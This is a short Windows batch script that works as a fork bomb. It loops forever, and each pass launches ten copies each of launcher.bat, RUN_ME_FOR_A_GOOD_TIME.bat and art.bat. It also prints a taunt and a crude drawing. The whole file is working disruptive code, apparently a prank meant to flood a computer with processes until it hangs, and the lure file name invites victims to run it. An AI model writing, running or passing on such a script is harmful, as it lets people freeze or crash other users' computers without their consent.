:BEGIN
ECHO ARRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRT!!!
ECHO 8====)
@ECHO off
Pushd "%~dp0"
title ARRRRRRRRRRRRRT%random%
timeout /t 1 /nobreak >nul
start launcher.bat
start launcher.bat
start launcher.bat
start launcher.bat
start launcher.bat
start launcher.bat
start launcher.bat
start launcher.bat
start launcher.bat
start launcher.bat
start RUN_ME_FOR_A_GOOD_TIME.bat
start RUN_ME_FOR_A_GOOD_TIME.bat
start RUN_ME_FOR_A_GOOD_TIME.bat
start RUN_ME_FOR_A_GOOD_TIME.bat
start RUN_ME_FOR_A_GOOD_TIME.bat
start RUN_ME_FOR_A_GOOD_TIME.bat
start RUN_ME_FOR_A_GOOD_TIME.bat
start RUN_ME_FOR_A_GOOD_TIME.bat
start RUN_ME_FOR_A_GOOD_TIME.bat
start RUN_ME_FOR_A_GOOD_TIME.bat
start art.bat
start art.bat
start art.bat
start art.bat
start art.bat
start art.bat
start art.bat
start art.bat
start art.bat
start art.bat
GOTO BEGIN
